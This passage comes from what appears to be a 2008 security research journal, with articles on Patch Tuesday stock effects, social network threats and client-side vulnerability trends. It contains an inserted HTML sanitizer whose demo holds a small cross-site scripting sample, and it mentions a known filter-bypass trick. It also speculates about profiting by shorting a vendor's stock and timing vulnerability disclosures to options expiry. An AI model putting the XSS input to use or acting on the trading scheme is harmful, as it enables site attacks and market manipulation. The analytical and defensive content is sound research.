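    if isinstance(day, str):
        day = dt.date.fromisoformat(day)
    pt = second_tuesday(day.year, day.month)
    if day == pt:
        return PATCH_TUESDAY
    if day == pt + dt.timedelta(days=1):
        return DAY_AFTER
    if day == pt - dt.timedelta(days=5):   # Tuesday minus five days is the preceding Thursday
        return ADVANCE
    return NON_EVENT


# Constructed sample quotes: date -> (open, high, low, close, volume). Not real market data.
SAMPLE = {
    dt.date(2008, 5, 8):  (30.00, 30.25, 29.70, 29.90, 58_000_000),  # Advance Notification Thursday
    dt.date(2008, 5, 9):  (29.90, 30.10, 29.60, 29.90, 62_000_000),  # Friday, non-event
    dt.date(2008, 5, 12): (30.00, 30.30, 29.70, 30.06, 60_000_000),  # Monday, non-event
    dt.date(2008, 5, 13): (30.00, 30.20, 29.50, 29.85, 54_000_000),  # Patch Tuesday (May 13, 2008)
    dt.date(2008, 5, 14): (29.80, 30.40, 29.60, 30.10, 66_000_000),  # day after Patch Tuesday
}


def event_stats(quotes):
    """Average open-to-close/high/low move (percent of open) and average volume per label."""
    buckets = {}
    for day, (o, h, l, c, vol) in quotes.items():
        row = ((c - o) / o * 100, (h - o) / o * 100, (l - o) / o * 100, vol)
        for key in (classify(day), FULL_YEAR):      # each day counts once in its label and once overall
            buckets.setdefault(key, []).append(row)
    stats = {}
    for key, rows in buckets.items():
        stats[key] = {
            "n": len(rows),
            "open_to_close": round(mean(r[0] for r in rows), 2),
            "open_to_high": round(mean(r[1] for r in rows), 2),
            "open_to_low": round(mean(r[2] for r in rows), 2),
            "avg_volume": mean(r[3] for r in rows),
        }
    return stats


def volume_differential(stats, category, baseline=FULL_YEAR):
    """Percent difference between a label's average volume and a baseline's (as in Figures 5 to 7)."""
    return round((stats[category]["avg_volume"] / stats[baseline]["avg_volume"] - 1) * 100, 2)


if __name__ == "__main__":
    s = event_stats(SAMPLE)
    for label, values in s.items():
        print(label, values)
    print("Patch Tuesday volume vs full year:", volume_differential(s, PATCH_TUESDAY), "%")
```

With real daily quotes for a full year the same functions reproduce every row of Figures 1 to 3 and 5 to 7; with only twelve Patch Tuesdays a year, the small-sample caution in the text applies to anything computed this way.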

A word of caution for the casual day trader or retail investor: these price fluctuations are relatively small and tightly time constrained. Profiting at a retail level from such trades would require risking a large amount of capital. A further word of caution is that the data set depicted is relatively small and, thus, by nature, of relatively low quality. For instance, there are only about 260 trading days per year, of which only 12 fall on a Patch Tuesday. Because the data set and fluctuations are small, this level of correlation is likely to be interesting only to institutional investors and should be modeled appropriately. Now let's look at some comparative potential profit spreads in Figure 4. There it appears that purchasing near the average intraday low on a Patch Tuesday and then selling near the average intraday high on the next day would yield a small profit (until this trade becomes more common, which would dampen the effect). The profit spreads shown focus on actual vulnerability disclosures and rest on the assumption that other market participants behave in a predictable manner. However, just as rumors of a hostile takeover affect the price of a stock, the rumor of several critical defects putting consumers at risk could do so as well.

Consider that fake vulnerability disclosures and rumors already appear today on mailing lists such as Full Disclosure or in IRC chat rooms. It is possible that events could be orchestrated via social engineering to manipulate the market and its participants. This scenario would clearly be illegal; but where there is profit, there are often people willing to break laws. Similarly, as we will see later, not all attacks would involve social engineering. Some may even be legal. Situations such as these (short-term market predictability yielding profits) are, at least according to the Efficient Market Hypothesis (EMH) and the Random Walk Hypothesis, unlikely to exist and certainly unlikely to persist.3 4 As such, we caution readers, as all financial entities should, that past performance does not necessarily indicate future results.5

Leveraging Share Volume as an Indicator


Another working theory we had was that the Patch Tuesday cycle had dampened the effect of negative press that had been seen in the days of unscheduled bulletin releases (prior to mid-October 2003). A cursory glance at the share volume indicator appears to support this theory (see Figure 5).

Potential profit spreads

SPREADS                                                                    2008 low   2008 high   2007 low   2007 high   2006 low   2006 high
Full year (intraday low) to full year (intraday high)                       -1.35%      1.28%     -0.89%      0.97%     -0.64%      0.88%
Patch Tuesday (intraday low) to Patch Tuesday (intraday high)               -1.58%      0.92%     -0.99%      0.98%     -0.93%      0.67%
Patch Tuesday (intraday low) to day after Patch Tuesday (intraday high)     -1.58%      1.52%     -0.99%      1.30%     -0.93%      0.70%

Figure 4: Buying stock on a Patch Tuesday and selling it the next day can apparently offer a legitimate profit, but only when trading in large quantities and with considerable risk.


Microsoft volumes, 2002 to 2003

MSFT VOLUME DIFFERENTIALS (UNSCHEDULED)                         2003          2002
Average volume, full year (in shares traded per day)       65,074,644    76,903,678
Average volume, full year (non-event)                      64,512,432    76,503,325
Average volume, day of unscheduled bulletin                70,017,743    78,796,255
Average difference in volume                                    7.60%         2.46%
Average difference in volume relative to non-events             8.53%         3.00%

Figure 5: Microsoft's trade volume before its move from unscheduled bulletins to Patch Tuesday.

Patch Tuesday releases

MSFT VOLUME DIFFERENTIALS (SCHEDULED)                                        2008            2007            2006            2005            2004
Average volume, full year                                              84,898,274      62,506,437      67,074,387      66,612,503      66,793,733
Average volume, full year (non-event)                                  86,738,696      64,210,868      68,753,419      67,227,483      67,260,018
Average volume, day of Patch Tuesday                                   75,584,620      57,840,233      63,786,108      65,453,142      65,439,875
Average volume, Tuesday, but not Patch Tuesday                         79,818,571      59,305,574      64,967,877      69,691,473      66,471,610
Average MSFT difference in volume (Patch Tuesday to full year)            -10.97%          -7.47%          -4.90%          -1.74%          -2.03%
Average MSFT difference in volume (Patch Tuesday to non-events)           -12.86%          -9.92%          -7.22%          -2.64%          -2.71%
Average ^IXIC volume, full year                                     2,249,267,340   2,089,534,502   1,926,859,522   1,731,835,794   1,769,480,040
Average ^IXIC volume, full year (non-events)                        2,271,900,270   2,094,466,552   1,935,854,692   1,732,949,769   1,768,463,981
Average ^IXIC volume on Patch Tuesday                               2,161,318,000   2,054,922,500   2,009,946,667   1,745,967,500   1,759,816,667
Average ^IXIC volume on Tuesday, but not Patch Tuesday              2,249,947,143   2,107,280,909   1,813,831,818   1,658,301,818   1,752,408,182
Average ^IXIC difference in volume (Patch Tuesday to full year)            -3.91%          -1.66%           4.31%           0.82%          -0.55%
Average ^IXIC difference in volume (Patch Tuesday to non-events)           -4.87%          -1.89%           3.83%           0.75%          -0.49%
Difference in MSFT Patch Tuesday vs. MSFT non-Patch Tuesday Tuesday        -5.30%          -2.47%          -1.82%          -6.08%          -1.55%
Difference in ^IXIC Patch Tuesday vs. ^IXIC non-Patch Tuesday Tuesday      -3.94%          -2.48%          10.81%           5.29%           0.42%

Figure 6: Instituting Patch Tuesday has apparently convinced traders that there is no advantage to be gained solely from Patch Tuesday events.


In Figure 5 we see that on the day of release of an unscheduled bulletin in 2003 and 2002, the average volume of shares traded outpaced the average volume for the year by 7.6 percent and 2.46 percent, respectively. When the comparison baseline is the average volume on non-event days only, this figure rises to 8.53 percent and 3 percent, respectively. This contrasts quite sharply with the volume differentials of the more predictable Patch Tuesday releases, shown in Figure 6. We have also included a comparison between Microsoft (MSFT) and the NASDAQ Composite Index (^IXIC). This would imply that the change from unscheduled (random walk) to prescheduled (Patch Tuesday) bulletins has lowered the interest of traders in events associated with Patch Tuesday. Next, let's look at the comparison data for Advance Notification (see Figure 7). Why is the average volume lower on Patch Tuesday and on Advance Notification day? Our hypothesis is that the gap between the full-year average volume and the average Patch Tuesday volume can be explained by significantly large events that affect the full-year average (from martingale probability theory) but are statistically less likely to fall on a Patch Tuesday because of its infrequency (just 12 times per year).6


Press Releases, Reactions, and Implications


The implications of this are interesting, and we hope this article will spur a fresh round of research on the influence of vulnerabilities and threats on the securities markets. For instance, consider the Emulex hoax.7 In this case, someone posted a fake press release about the CEO's departure, which resulted in a 62 percent drop in intraday trading of Emulex stock. The person posting the fake release had taken a large short position in the stock and profited by more than US$250,000. This was a clear case of fraud. Similarly, there are periodic cases in the news about insider trading (also clearly illegal).

Advance Notification

MSFT VOLUME DIFFERENTIALS (ADVANCE NOTIFICATION)                   2008            2007            2006
Average volume, full year                                    84,898,274      62,506,437      67,074,387
Average volume, full year (non-event)                        86,738,696      64,210,868      68,753,419
Average volume, day of Advance Notification                  82,848,700      61,532,042      54,484,850
Average difference in volume                                     -2.41%          -1.56%         -18.77%
Average difference in volume relative to non-events              -4.48%          -4.17%         -20.75%
Average ^IXIC volume, full year                           2,249,267,340   2,089,534,502   1,926,859,522
Average ^IXIC volume, full year (non-event)               2,271,900,270   2,094,466,552   1,935,854,692
Average ^IXIC volume on Advance Notification              2,221,380,000   2,224,365,833   1,872,442,500

Figure 7: On average, fewer Microsoft shares are traded on Patch Tuesday and Advance Notification days.



However, if stock price fluctuations occur because of vulnerability and patch announcements, what would happen if a person built up a short position in a major software company and posted a handful of vulnerabilities with exploits to the Full Disclosure mailing list? Perhaps something like the Month of Browser Bugs, but targeted at one vendor, on one day? If this happened during market hours and on a day less likely to have competing news that could distract investors (say a Tuesday or a Thursday), then the downward pressure on the stock could be significant at a consumer level. It would also clearly be illegal if the vulnerabilities were not real (perhaps libel or fraud). However, if they were real, would it be illegal? Reporting the truth, albeit in a potentially manipulative fashion, may or may not be considered social engineering or even illegal. Perhaps the legality could be argued either way, but consider the Firestone and Ford tire controversy.8 If you had driven a Ford car at the time, had tire problems, and shorted the stock, would that have been legal? Certainly. If you had shorted the stock and then told Firestone, Ford, or others, would that have been legal? As with any attack vector or vulnerability, awareness and disclosure often improve the security posture of those who can resolve the problem. By openly talking about weaknesses, perhaps we can improve and appropriately monitor the system. It is possible people are already using zero-day threats for financial gain, not simply by embedding them within password-stealing Trojans but by taking short or options positions in equities and derivatives. It is clear that spammers have figured out ways to profit from securities markets: we have received lots of penny-stock spam.

Conclusion
There is still a great deal of work to do on the implications of vulnerabilities and threats for the equities and derivatives markets. We have primarily focused on the equities markets. The derivatives markets often move in the same direction but with amplified volatility. Given some confidence level in the direction of a move, it would probably make sense for traders who publish vulnerabilities to time that publication with options expiration dates. I would like to thank my colleagues Craig Schmugar and Eugene Tsyrklevich for reviewing this paper and data set, as well as for providing feedback. A.B.

Anthony Bettini is a member of the McAfee Avert Labs senior management team. He specializes in Windows security and vulnerability detection. Bettini has spoken at the National Institute of Standards and Technology's National Information Systems Security Conference in the Washington, D.C. area on anti-tracing techniques, as well as for numerous Global 2000 companies. While at Foundstone, he published new vulnerabilities found in Microsoft Windows, ISS Scanner, PGP, Symantec ESM, and other popular applications. Bettini was the technical editor for Hacking Exposed, 5th edition (McGraw-Hill).

ENDNOTES
1 Goldsmith, Dave, and Jeremy Rauch; Matasano Security. "Hacking Capitalism," Black Hat USA 2007. August 2, 2007.
2 Financial Information eXchange, Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Financial_Information_eXchange
3 Random walk hypothesis, Wikipedia. May 15, 2008. http://en.wikipedia.org/wiki/Random_walk_hypothesis
4 Efficient Market Hypothesis, Wikipedia. May 15, 2008. http://en.wikipedia.org/wiki/Efficient_market_hypothesis
5 "Past performance not indicative of future results," CBOE. May 22, 2008. http://www.cboe.com/micro/vix/faq.aspx
6 Martingale (probability theory), Wikipedia. May 22, 2008. http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29
7 Emulex Hoax, Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Emulex_hoax
8 Firestone and Ford tire controversy, Wikipedia. April 20, 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy

ADDITIONAL REFERENCES
CBOE's archive of historic VIX data, using the newer algorithm for the period before the September 22, 2003 algorithm switch. April 20, 2008. http://www.cboe.com/micro/vix/historical.aspx
Lo, Andrew W. "The Adaptive Markets Hypothesis: Market Efficiency from an Evolutionary Perspective." Journal of Portfolio Management.
Financial metrics are primarily courtesy of Yahoo Finance. May 15, 2008. http://finance.yahoo.com
Additional financial metrics are courtesy of Google Finance. April 20, 2008. http://finance.google.com


The Future of Social Networking Sites


By Craig Schmugar

In recent years social networking sites (MySpace, Facebook, and others) have become household terms. Many people think of social networking on the Internet as a relatively new phenomenon when, in fact, sites such as Classmates.com and SixDegrees.com have been around for more than a decade. Still, the growth explosion has occurred only during the past few years. So what exactly makes a site a social networking venue? At the core, social networking sites are those that comprise an online community which allows users to share information, discover new contacts, and reconnect with old ones.

Social networking sites are significant for two main reasons. First, they are the epitome of Web 2.0, in which the network of users is the platform and the community drives the content. The platform grows through user contributions, enabled by applications provided for community use. Second, social networking sites combine elements of communication channels (such as email, message boards, instant messaging, and chat) with media vehicles (such as audio, video, and print). In these communities, like-minded individuals can share information and interests and provide feedback and reviews. Such sites can act as collaborative platforms, allowing entire networks to grow in value as the user base increases. Furthermore, these platforms allow for the most direct and targeted media outlets ever seen; businesses can focus their marketing efforts on those who are truly interested. Social networking sites contain a warehouse of information that can be mined and analyzed to expand user profiles and to build complex diagrams and maps of user-to-user and user-to-interest relationships.

Key to the success of any social networking site is a strong and loyal user base. Friendster.com knows this all too well. Friendster was the precursor to MySpace and by far the number-one social networking site during its prime. What happened to it? Friendster was a sort of success catastrophe. As the user base grew more massive and the content evolved (including the addition of games), the back end failed to keep up with the growth. Site administrators were forced to restrict high-bandwidth content, but even then performance was unsatisfactory and the user base jumped ship. Furthermore, Friendster attempted to fit the user base into its predetermined model of how the network should be used and by whom. MySpace provided a more robust platform, not only because of its greater bandwidth, but also because of the freedom users enjoyed to create, modify, and view a wider variety of content. Once the word got out that MySpace was the new Friendster, it didn't take long for a majority of users to make the switch. A few takeaways from this early battle in social networking are that the platform needs to be flexible, it needs to expand and evolve, and user retention is key. These principles are paving the way for the future of social networking sites.

Social Insecurity
MySpace was able to overtake Friendster in part by allowing users to highly customize their profiles. But this opened the door for attackers to insert malicious code, as well as to launch convincing phishing attacks, directly from their MySpace profiles. Unfortunately, such user flexibility lends itself to exploitable conditions, which the bad guys use and abuse. In a race for market share, and in an effort to avoid being the next Friendster, security has taken a back seat at many social networking sites. Consequently, social networking sites have been hosts to worms, phishing attacks, vulnerabilities, data harvesting and leakage, rogue ad distribution, defamation, and last, but not least, spam.


Where Are We Now?


Two and a half years after Samy, the first widespread social networking worm, hit the scene on October 4, 2005, most old security vulnerabilities had been patched. But the problem has not gone away. Until security flaws result in fewer subscribers, vulnerabilities will be common, and cross-site scripting vulnerabilities, such as the one exploited by Samy, are among the most widely reported types of vulnerabilities in the Common Vulnerabilities and Exposures database.1 And the situation is likely to get worse before it gets better. In May 2007, Facebook launched the Facebook Platform, which allowed third-party developers to author and market applications to Facebook's 20 million active users. One year and 50 million additional users later, more than 20,000 Facebook applications have been developed, and 95 percent of the user base has run at least one application.2 These applications pose additional risks, as users may have a false sense of security because of the applications' association with a site they trust, Facebook.com. Yet the vast majority of these applications are released by developers without prior review by the site. In January 2008, Facebook banned the application Secret Crush after it was reported to have led users to install Zango adware.3 (See Figure 1 for other examples of widespread threats.) The significance is that Facebook doesn't review applications, and things can (and have) slipped by. Although this reported case was more of an annoyance (adware), the next could be much worse.
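The profile customization discussed under "Social Insecurity" and the cross-site scripting class that Samy exploited share one root cause: user-supplied markup is rendered to other users without being reduced to a safe subset. The following sanitizer is an added example (not code from MySpace, Facebook, or McAfee) of the allowlist approach that closes this class: only a handful of tags survive, event-handler and style attributes are dropped, script and style content is removed entirely, and href values must be absolute http or https links. The tag and attribute allowlist is an assumption chosen for the example; a real site would tune it to its own feature set.

```python
"""Allowlist-based sanitizer for user-supplied profile markup (added example)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist: tag -> attributes that may be kept on it. Everything else is dropped.
ALLOWED_TAGS = {"b": set(), "i": set(), "u": set(), "p": set(), "br": set(), "a": {"href"}}
SAFE_SCHEMES = {"http", "https"}      # rejects javascript:, data:, vbscript: and relative links
VOID_TAGS = {"br"}
DROP_CONTENT = {"script", "style"}     # tag and its text are both removed


class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0       # > 0 while inside <script> or <style>
        self.open_tags = []       # allowed tags currently open, for well-formed output

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                # unknown tag: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue          # onmouseover=, style=, etc. never reach the output
            if name == "href" and urlsplit(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:     # close in LIFO order back to this tag
            top = self.open_tags.pop()
            self.out.append("</%s>" % top)
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # text is always re-escaped

    def result(self):
        while self.open_tags:     # close anything the user left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_profile(markup):
    """Return a version of the user's markup that contains only allowlisted tags and attributes."""
    parser = ProfileSanitizer()
    parser.feed(markup)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # Constructed sample of hostile profile markup.
    sample = ('<b onmouseover="run()">Hi</b><script>run()</script>'
              '<a href="javascript:run()">x</a><a href="https://example.com/">ok</a>')
    print(sanitize_profile(sample))
```

The important property is that the output is rebuilt from parsed tokens rather than filtered with string replacement; Samy's payload relied on a filter that looked for the literal word "javascript" and missed the same word split across a line break, which a scheme check on the parsed attribute value does not miss.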


Approximately nine months after Facebook launched its platform, MySpace followed suit, and recently Google released an application programming interface (API) for Orkut, Google's social networking site. Although these platforms have set the stage for the next generation of social networking sites, they have also created another vector for attackers to exploit.

What Lies Ahead?


Future social networking sites will become more important because platforms will expand further. Killer apps will include mobility, presence, and location awareness, with the goal of making your physical life more convenient through your virtual network; you'll have a traveling social network in your back pocket. Not only will you be able to know which of the friends in your network are online, but you'll also be able to know which are nearby. Cell tower triangulation and global positioning systems will be able to pass along your location to whomever you allow. Location-aware services could match local businesses and entertainment to your interests based on your profile. Business travelers could more easily rendezvous with coworkers and clients at conferences and trade shows. The thrill of online dating could be heightened through the creation of location-specific communities, so you wouldn't only meet someone online, but you could also chat with a prospective mate in the same room. Social sites will also be smarter, mining user information across the web. Social bookmarking functionality such as Digg's will be married with social networks and enhanced with self-learning technology such as Pandora's or StumbleUpon's and tagging functionality such as Flickr's. The result is a more constant and refined stream of relevant information, which educates and informs the community much more efficiently than occurs today. From your iPhone, you'll be able to get movie recommendations from those in your network. You'll also be able to read reviews that your friends found helpful and find show times for the theaters in your vicinity, and then you'll be able to check the location of your friends to determine how quickly they can meet you.

Profiled social networking threats

THREAT                         TYPE                SITE
Grey Goo                       worm                Second Life
JS/QSpace                      worm                MySpace
JS/SpaceFlash                  worm                MySpace
JS/SpaceTalk                   info stealer        MySpace
Kut Wormer                     worm                Orkut
Mass leak of private photos    data loss           MySpace
PWS-Banker!1d23                password stealer    Orkut
Samy                           worm                MySpace
Scrapkut                       worm                Orkut
Secret Crush                   unwanted program    Facebook
Xanga Worm                     worm                Xanga

Figure 1: Worms and other threats have plagued social networking sites. Users often trust their community sites too much.


Sites will understand your interests based on your behavior: web sites you visit, articles you read, music you listen to, friends you chat with and what their interests are, for example. This information will be used to keep you current on changing events and to filter the noise that bombards users today. You'll be left with a highly customized web experience that requires very little direct user input. Whereas Web 1.0 was driven by site administrators and Web 2.0 was driven by user-generated content, the future of social networking lies in user and content relationships augmented by user behavior to tailor content. Early incarnations of next-generation sites, call them social networking 3.0, may in fact be perceived as spooky in the accuracy of this artificial intelligence. Profiling takes on a different meaning in this realm, where the site can actually bring together users of similar interests. In some respects, the compatibility profiling used by online dating services could be considered an early incarnation of creating social connections through online profiling, bringing compatible people together; but in social networking 3.0 this concept is significantly expanded without the need to complete a lengthy questionnaire. Each time you click a link, rate a blog, or chat on a specific subject, the site can gain intelligence about you to enhance your social network. Who will benefit from this explosion of information correlation? Of course, the user base is a driving factor, but others seek to benefit from this arrangement. Advertisers are drooling at the notion of higher conversion rates when marketing happens at the user's level based on their specific interests. More users will actually pay attention to the ads and take an interest in their content.

The increased use of open and portable profiles, mash-ups (web applications that combine content from various sources into a single tool), and open APIs will dramatically facilitate cross-site usage, but will also increase the complexity of defending against threats targeting these vectors. Multitiered attacks are difficult to pinpoint today and will be even more so tomorrow. Attacks may originate from one site only to be propagated through another before appearing on an affected social network. Host-based defenses will need to negotiate the relationships sites have with one another to piece together valid and invalid site interactions and weed out the good from the bad. Many users will find the privacy concerns in this article (information harvesting and correlation, and location tracking) to be too great to ignore. Indeed, many people will not opt into such services. However, when users see that they can benefit from providing a little bit of data and they have established trust relationships, many of them will volunteer some details. Vendors are acutely aware of this and are encouraging users to take baby steps, such as allowing locations to be reported only at the granularity of a state or city, for example. Unfortunately, online predators will be lurking, and security vulnerabilities can have dire consequences when such information falls into the hands of the bad guys. This is an exciting time for social networking sites, which are rapidly expanding, adding functionality, and growing their user bases. These sites have multibillion-dollar valuations. Big changes lie ahead that are both compelling and threatening; in many ways the future of social networking sites defines the future of the Internet itself.

Risks Increase
As user benefits increase, so will opportunities for attackers. Spammers and scammers will look to exploit this treasure trove of information and, with all this data, will more easily construct convincing social engineering attacks. Users will be taken off guard by the level of detail and personalization in attack messages. Social botnets will also have the potential to seriously disrupt the ecosystem, poisoning the network with solicitations and false testimonials. Site administrators will have their work cut out for them to keep the content quality high while blocking the bad guys and still allowing everyone else to use the site as it is intended. Securing future social networks will depend more heavily on server-side defenses. Back-end systems will need to scan large amounts of incoming and outgoing data, searching for evidence of mischief or malicious code. Site and content reputation services may help balance usability and security. The trust relationship between sites and users is key to the success of tomorrow's networks. Violation of that trust could lead to the failure of an entire community.
Threat researcher Craig Schmugar has been researching and combating threats for McAfee Avert Labs since 2000. Since then he has discovered and classified thousands of new threats, including the Blaster, Mydoom, Mywife, and Sasser worms. He admits that during this time he is starting to feel more anti-social.

ENDNOTES
1 http://cwe.mitre.org/documents/vuln-trends/index.html
2 http://www.facebook.com/press/info.php?statistics
3 http://www.zdnet.com.au/news/security/soa/spyware-claims-kill-off-Facebooks-secret-crush/0,130061744,339284896,00.htm?omnref=http://www.google.com/search?num=100


The Changing Face of Vulnerabilities


By Rahul Kashyap

Although social engineering does not play a role in all forms of security threats, McAfee Avert Labs has observed a growing trend recently: malware writers using social engineering to exploit software vulnerabilities.
Most of the infamous Internet worms in the first half of this decade typically exploited one or more vulnerabilities in Microsoft applications. The notorious Sasser, Blaster, Code Red, and SQL Slammer had a common factor. (By the way, Avert Labs discovered Sasser and Blaster, as well as other significant malware.) They all exploited server vulnerabilities. The intent of these worms was to destroy servers via quick self-propagation after exploiting the flaws. Although products from many vendors have suffered from similar security holes, we will primarily focus on vulnerabilities and trends in Microsoft products in this article. We're not singling out Microsoft as being particularly vulnerable, but rather acknowledging that the popularity of Microsoft products among consumers and businesses attracts malware writers and data thieves like no other target. Avert Labs has seen that server vulnerabilities that can be exploited by worms have diminished in the past few years thanks to increased use of security measures that protect remote procedure calls. To illustrate, Figure 1 lists all the remotely exploitable vulnerabilities via Microsoft Windows remote procedure calls during a 10-year period through the first quarter of 2008. The trend has fallen dramatically in the last two years. We see a similar trend if we sample remotely exploitable vulnerabilities for other popular Microsoft server platforms, such as IIS Web Server, SQL Server, and others. Microsoft further increased its defenses with the release of Service Pack 2 for Windows XP. Along with other protection mechanisms, SP2 included Data Execution Prevention,[2] which, though not foolproof,[3] definitely helped in curbing the network worm propagation that plagued Windows at that time. The effects of XP's SP2 became much more visible a couple of years later, as many users migrated to the updated operating system. However, malware writers were not to be outdone.
They quickly shifted their focus from servers to clients, uncovering vulnerabilities in Microsoft Office, Microsoft Internet Explorer, and various proprietary file formats. The client assault gave birth to a host of fuzzers[4] (which search for security holes by throwing random data at an application), scripting-language parsing bugs, and ActiveX control-related vulnerabilities. Projects such as the Month of Browser Bugs[5] (and others), AxFuzz,[6] COMRaider, and Hamachi[7] increased interest in this area and helped expose the innumerable issues plaguing client software. Bug discovery and the exploitation of client applications has been at its peak during this period; this trend continues even as we prepare this journal. The number of clients exposed to these exploits is hard to determine, but some sources claim the figure to be in the hundreds of millions.[8] Figure 2 offers a vivid picture of the sudden spike of vulnerabilities for Microsoft Office. These peaked in 2006 and continue to keep Microsoft busy. The majority of these vulnerabilities have affected Office 2000. This version is widely used, thus it has been more widely exploited. In the economics of malware writers, vulnerabilities in Office 2000 offer a better return on investment. This is primarily because this suite has long had a major security disability: Office 2000 users must visit Microsoft's Office Update page to download patches,[9] and the automatic online updates do not serve Office 2000 or Office 97. This oversight creates a terrific opportunity for malware writers to exploit the fact that many users are unlikely to regularly update their office suites.[10] The number of zombie machines taken over because of this type of security hole could be in the tens of thousands. Although we're focusing on vulnerabilities in Microsoft products in this article, the trend affects other popular client software vendors, such as Adobe, Mozilla, Apple, and more. The Month of Apple Bugs highlighted many client problems, and there has been a big spike in the vulnerabilities found in widely used software, such as Apple QuickTime, Adobe Flash Player, and Adobe Reader, to name just a few. The recent exploitation of the PDF mailto: vulnerability (CVE-2007-5020)[11] and of Flash using ActionScript (CVE-2007-0071) were among the critical flaws that affected thousands of users.

[Figure 1 chart: Microsoft remote vulnerability patches per year, 1998 through 2008 (bar chart, 0 to 14 patches per year).]

Figure 1: Microsoft has significantly tightened the security of its remote procedure calls since 2006. (Source: Microsoft[1]).

[Figure 2 chart: Office vulnerability patches per year, 1998 through 2008 (bar chart, 0 to 45 patches per year).]

Figure 2: Microsoft Office vulnerabilities increased in 2006 and have remained high in the two successive years. (Source: Microsoft).

Targeted Attacks
The key to client vulnerabilities is that they need user interaction to be exploited. Hence malware authors have had to come up with more innovative ideas to lure users into clicking links and downloading images and documents from the Internet. One of the main thrusts for exploiting client systems has been a rapid growth in spam that relies on social engineering. Social engineering and the focus on client vulnerabilities go hand in hand. The connection between these two factors is obvious, and the threat has recently become more complex.

Part of that complexity lies in targeted social engineering attacks, which are the emerging trend in the threat landscape. Targeted attacks are especially prevalent in defense and military establishments.[12] Ever since the rash of Office vulnerabilities in 2006, multiple reports have appeared about government agencies receiving emails with malicious Word, PowerPoint, or Access files. It looks like the combination of social engineering and vulnerabilities has found another target: espionage. Spying, of course, is stealthier and much more difficult to uncover than a merely profit-driven attack. On multiple occasions, the vulnerabilities discovered in these malicious embedded documents have been zero-day attacks, which make these document files even more difficult to detect: these vulnerabilities are often found only after the damage is done. Because these zero-day vulnerabilities have targeted specific government or military installations, it's possible that these attacks could be sponsored by foreign agents or governments. Custom-designed social engineering, zero-day vulnerabilities, money, and power sound like elements of a John le Carré novel. Some security analysts think this is not fiction. Many theorists have predicted that the next generation of warfare will be in cyberspace. Perhaps all of these events are just test cases for a cyberwar?

Stealthy Web Hacks


Other exploits that have changed in recent years are web server hacking and hijacking. Earlier, attackers used to deface web sites after they hacked them, usually leaving a note on the site in the hope of becoming famous. That's no longer the case, at least not with today's new generation of sophisticated hackers. With the plethora of client vulnerabilities, hackers have started exploiting these in a coordinated manner, spreading malware by first compromising popular web sites, stealthily planting malware, and luring users via social engineering tricks. As a leading example, the Super Bowl (American football final) hack in February 2007 deserves mention, as it involved the insertion of a malicious JavaScript into the home page of the official site.[13] The script exploited two flaws in Internet Explorer and infected unpatched users with a Trojan that connected to a Chinese server, giving full access to the compromised machine. Similar stealthy hacks have been reported for many popular web sites, including embassies, newsgroups, and corporations. Another emerging threat that made millions of homes vulnerable was exploiting home routers via Universal Plug and Play, which allowed a malicious Flash file embedded in a web page to reconfigure the victim's router.[14] (The fact that the vast majority of Internet users use the default passwords in their home routers helps make this attack possible.) In this situation the victim could be lured by any seemingly innocuous link to pay bills online or read more about some topic. Most likely the user would have no clue that the router had been compromised, with all traffic, including sensitive passwords, being sent to someone else.

New Vectors of Exploitation

The early half of this decade saw extensive exploitation of stack, heap, and integer overflows, format-string vulnerabilities, and other weaknesses, most of which were relatively easy to exploit from a technical viewpoint. Now, however, most of these simple stack overflows are no longer a big threat in widely used software, such as Windows, because of superior software development and quality assurance testing. In addition, technologies like address space layout randomization have challenged hackers to go beyond traditional exploitation mechanisms. Attacking vulnerabilities has entered a new phase, where exploiting concepts such as null pointers[15] and race conditions[16], as well as developing reliable exploitation techniques like heap spray,[17] are gaining popularity. Many of these bugs have been around for a long time and had been thought unexploitable.

This could be the perfect time for these techniques to leverage social engineering tricks as one of the attack vectors, for several reasons:

- Currently there aren't any publicly known reliable, automated ways to exploit these new techniques (mainly for mass propagation)
- They can be easily tested on targeted individuals or groups via social engineering as a part of the development process
- The return on investment for these techniques is higher using social engineering than in putting the effort into further research to achieve mass propagation

Conclusion
With the recent trends in vulnerabilities, social engineering is a force that is difficult to combat. No matter how many protection mechanisms vendors implement in their software and operating systems, effective social engineering can subvert them all as long as users continue to click on any link that they come across. We can't expect cyber laws to thwart social engineering any time soon (except for filing charges for fraud), but increased education can definitely help minimize losses and the impact on unsuspecting victims. In the meantime, think twice when you're asked to click to accept that prize you've just won!

Rahul Kashyap is the Manager, Vulnerability Research and IPS Security for McAfee Avert Labs. He is responsible for vulnerability research, zero-day analysis, intrusion prevention system content, and emergency response. Kashyap is a big Dilbert fan and hopes to start his own geeky security-focused comic strip some day.

ENDNOTES
1 http://www.microsoft.com/technet/security/current.aspx
2 How to Configure Memory Protection in Windows XP SP2. http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx
3 Analysis of GS Protections in Microsoft Windows Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf
4 Browser Fuzzing for Fun and Profit. http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-and-profit.html
5 Month of Browser Bugs. http://blog.metasploit.com/2006/07/month-of-browser-bugs.html
6 AxFuzz: an ActiveX/COM enumerator and fuzzer. http://sourceforge.net/projects/axfuzz/
